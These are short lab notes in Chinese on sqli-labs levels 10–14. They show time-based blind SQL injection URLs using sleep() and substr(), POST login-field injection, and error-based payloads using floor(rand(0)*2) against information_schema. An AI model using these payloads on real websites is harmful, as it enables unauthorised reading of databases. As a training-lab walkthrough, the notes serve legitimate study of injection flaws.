0x10 less-10
http://localhost/sqli-labs-master/Less-10/?id=1" and sleep(5)-- + //判斷後臺閉合方式http://localhost/sqli-labs-master/Less-10/?id=1" and if(substr((select database()),1,1)='s',sleep(5),null)-- + //判斷數據庫等http://localhost/sqli-labs-master/Less-10/?id=1" and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(5),null)-- +0x11 less-11
從11關開始就由GET型注入變成POST注入了
一般第一個登陸字段(一般是用戶名)就用註釋,第二個登陸字段(一般就密碼)用閉合和註釋都是可以的
利用盲注獲取信息
0x12 less-12
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”“”) and password=(“”) LIMIT 0,1’ at line 1
由錯誤信息可以推斷出後臺句子,其他同less-11
0x13 less-13
這裏開始急事正確也不返回信息了,這可怎麼辦呢,我們想起來之前第六課利用的基於錯誤的返回
利用到floor()、rand()等
') and (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2))) as c from information_schema.tables group by c)a)-- +0x12 less-14
" and (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2))) as c from information_schema.columns group by c)a) -- +